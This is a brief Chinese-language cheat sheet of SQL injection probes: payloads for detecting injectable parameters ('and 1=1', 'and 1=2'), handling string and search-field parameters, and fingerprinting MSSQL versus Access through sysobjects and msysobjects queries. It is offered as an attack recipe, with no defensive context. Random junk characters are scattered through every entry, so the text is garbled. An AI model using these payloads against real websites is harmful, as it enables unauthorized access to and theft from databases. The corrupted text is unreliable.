1.判断是否有注入;and 1=1 ;and 1=2 E0DEFB
2.初步判断是否是mssql ;and user>0 ,6buo~?W:
gq@."wHU
3.注入参数是字符'and [查询条件] and ''=' N8{>M,
_5LlL#)
4.搜索时没过滤参数的'and [查询条件] and '%25'=' F_Pd\Aq8
t@HE.h
5.判断数据库系统 z0W+4meoH
4 z`5W,
;and (select count(*) from sysobjects)>0 mssql YWZF*,4
h B+ t
pa
;and (select count(*) from msysobjects)>0 access +{w&ksk
SA7,]&Zb